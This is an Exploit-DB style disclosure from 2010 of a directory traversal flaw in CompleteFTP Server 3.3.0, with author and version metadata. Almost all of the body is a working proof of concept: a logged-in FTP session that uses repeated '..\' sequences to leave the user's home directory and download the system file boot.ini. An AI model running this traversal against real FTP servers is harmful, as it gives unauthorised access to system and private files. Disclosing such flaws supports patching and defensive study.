CompleteFTP Server - Directory Traversal

EDB-ID:

11973

CVE:


Author:

zombiefx

Type:

remote

Platform:

Windows

Published:

2010-03-30

# Exploit Title: CompleteFTP Server Directory Traversal
# Date: 2010-03-30
# Author: zombiefx darkernet@gmail.com<mailto:darkernet@gmail.com>
# Software Link: http://www.enterprisedt.com/products/completeftp/download/CompleteFTPSetup.exe
# Version: CompleteFTP Server v 3.3.0
# Tested on: Windows XP SP3
# CVE :
# Code :
230 User test logged in.
ftp> pwd
257 "/Home/test" is current directory.
ftp> cd ..\..\..\..\..\..\..\..\
250 Directory changed to "/Home/test/..\..\..\..\..\..\..\..\".
ftp> get boot.ini
200 PORT command successful.
150 Opening ASCII mode data connection for boot.ini
226 Transfer complete.
ftp: 215 bytes received in 0.14Seconds 1.54Kbytes/sec.